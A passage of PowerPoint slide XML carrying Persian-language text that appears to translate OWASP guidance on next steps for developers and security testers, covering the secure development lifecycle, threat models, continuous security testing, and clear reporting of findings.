                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>گام بعدی برای توسعه‌دهندگان</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19252D53-D1BD-49D9-B2FA-F52853EFCB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143635" y="3167167"/>
            <a:ext cx="1034404" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>نیازمندی‌های امنیتی برنامه کاربردی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{101040FE-B986-4469-A5F9-41A759396C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130051" y="6512432"/>
            <a:ext cx="1073874" cy="341632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>چرخه‌ی حیات توسعه‌ی امن</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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264287619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43559">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>برقراری تست دائم امنیت برنامه</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1"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622841">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>ساختمان ساختمان ایمن بسیار مهم است. اما برای اطمینان از اینکه امنیت مورد نظر شما برای ساخت واقعی است، بسیار مهم است، به درستی اجرا شده و در همه جا مورد استفاده قرار گرفته است. هدف از تست امنیتی نرم افزار ارائه این شواهد است. این کار دشوار و پیچیده است و فرایندهای توسعه سریع مدرن مانند </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>Agile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>DevOps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>فشارهای شدیدی بر رویکردها و ابزارهای سنتی قرار داده اند. بنابراین ما به شدت از شما تشویق می کنیم تا به شما در مورد چگونگی تمرکز بر آنچه که در کل پروژۀ برنامه کاربردی شما مهم است تمرکز کنید و آن را به طور موثر انجام دهید.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>خطرات مدرن به سرعت حرکت می کنند، بنابراین روزهای اسکن یا نفوذ یک برنامه کاربردی برای آسیب پذیری ها را یک بار در سال یا خیلی طولانی از بین می برد. توسعه نرم افزار مدرن مستلزم تست امنیتی نرم افزاری در کل چرخه حیات توسعه نرم افزار است. نگاهی به بالا بردن خطوط توسعه موجود با اتوماسیون امنیتی که توسعه را کند نمی کند. هر روشی که انتخاب میکنید، هزینه سالیانه را برای آزمایش، ترجیح، بازخوانی، بازنگری و بازنشانی یک برنامه تکمیلی، ضرب در اندازه پرونده برنامه خود در نظر بگیرید.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>گام بعدی برای آزمونگران امنیت</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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181215"/>
            <a:ext cx="6479598" cy="5299061"/>
            <a:chOff x="219293" y="3150429"/>
            <a:chExt cx="6479598" cy="4891441"/>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just" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>قبل از اینکه شروع به آزمایش کنید، مطمئن شوید که شما درک آنچه اهمیت دارد که زمان را صرف کنید. اولویت ها از مدل تهدید آمده است، بنابراین اگر شما آن را ندارید، باید قبل از آزمایش یک مورد ایجاد کنید. استفاده از </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP ASVS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>و راهنمای تست </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> را به عنوان ورودی در نظر بگیرید و به فروشندگان ابزار وابسته نباشید تا تصمیم بگیرید که چه چیزی برای کسب و کار شما مهم است.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">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1320" y="4272476"/>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just" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>رویکرد شما به تست امنیتی نرم افزار باید بسیار با افراد، پردازش ها و ابزارهایی که در چرخه عمر توسعه نرم افزار </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>(SDLC) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>شما استفاده می شود، بسیار سازگار باشد. تلاش برای اعمال گام های اضافی، دروازه ها و بررسی ها احتمالا موجب اصطکاک، دور زدن و مبارزه برای مقیاس می شود. به دنبال فرصت های طبیعی برای جمع آوری اطلاعات امنیتی و ارسال آن به روند خود.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100" kern="1200" baseline="0" dirty="0">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792"/>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just" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>ساده ترین، سریعترین و دقیق ترین روش برای تایید هر مورد را انتخاب کنید. چارچوب آگاهی امنیتی </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> و استانداردهای تأیید امنیتی برنامه </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> می توانند منبع خوبی از نیازهای امنیتی و عملکرد غیرفعال در واحد شما و تست یکپارچه سازی باشند. اطمینان حاصل کنید که منابع انسانی مورد نیاز برای مقابله با مثبت های دروغین از استفاده از ابزارهای خودکار، و همچنین خطرات جدی منفی کاذب را در نظر بگیرید.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100" dirty="0">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fa-IR" sz="1050" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>استراتژی‌های آزمون</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just" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>شما مجبور نیستید همه چیز را آزمایش کنید. تمرکز بر آنچه که مهم است و برنامه تأیید اعتبار خود را در طول زمان گسترش دهید. این به معنای گسترش مجموعه امنیت و خطرات امنیتی است که به صورت خودکار تأیید و همچنین گسترش مجموعه برنامه ها و </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>API </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> ها تحت پوشش قرار می گیرد. هدف این است که برای رسیدن به یک کشور که در آن امنیت ضروری از تمام برنامه ها و </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>API </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> های شما به طور مداوم مورد تایید قرار می گیرد.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100" dirty="0">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fa-IR"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دقت و پوشش دستیابی</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34362"/>
              <a:ext cx="5549303" cy="787569"/>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just" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>مهم نیست چقدر خوب است که در حال آزمایش هستید، آن را تغییر نخواهد داد مگر اینکه شما آن را به طور موثر ارتباط برقرار کنید. ایجاد اعتماد با نشان دادن به شما می فهمید که چگونه برنامه کار می کند. به وضوح توضیح دهید که چگونه می توان آن را بدون "زبان صوری" مورد آزار قرار داد و شامل یک سناریوی حمله برای ایجاد آن واقعی است. برآورد واقع بینانه از اینکه آسیب پذیری چقدر سخت است کشف و بهره برداری و چگونگی بد بودن آن را بسازید. در نهایت، یافته های موجود در تیم های توسعه ی ابزار، از قبل استفاده می کنند، نه فایل های </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>PDF.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100" kern="1200" baseline="0" dirty="0">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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA493BA7-5997-4A18-9618-62319A0A692F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214008" y="3387238"/>
            <a:ext cx="935580" cy="392415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>درک مدل تهدید</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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA98B84-34A6-4B60-9C0A-BF59F260AF1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198165" y="4477473"/>
            <a:ext cx="935580" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>درک </a:t>
            </a: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 SDLC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>شما</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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4155ED7B-C46B-4C58-9799-5E20D5780F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116996" y="7744086"/>
            <a:ext cx="1151765" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>تبادل واضح یافته ها</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRP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10161810"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8643411"/>
          <a:ext cx="6849380" cy="1262589"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
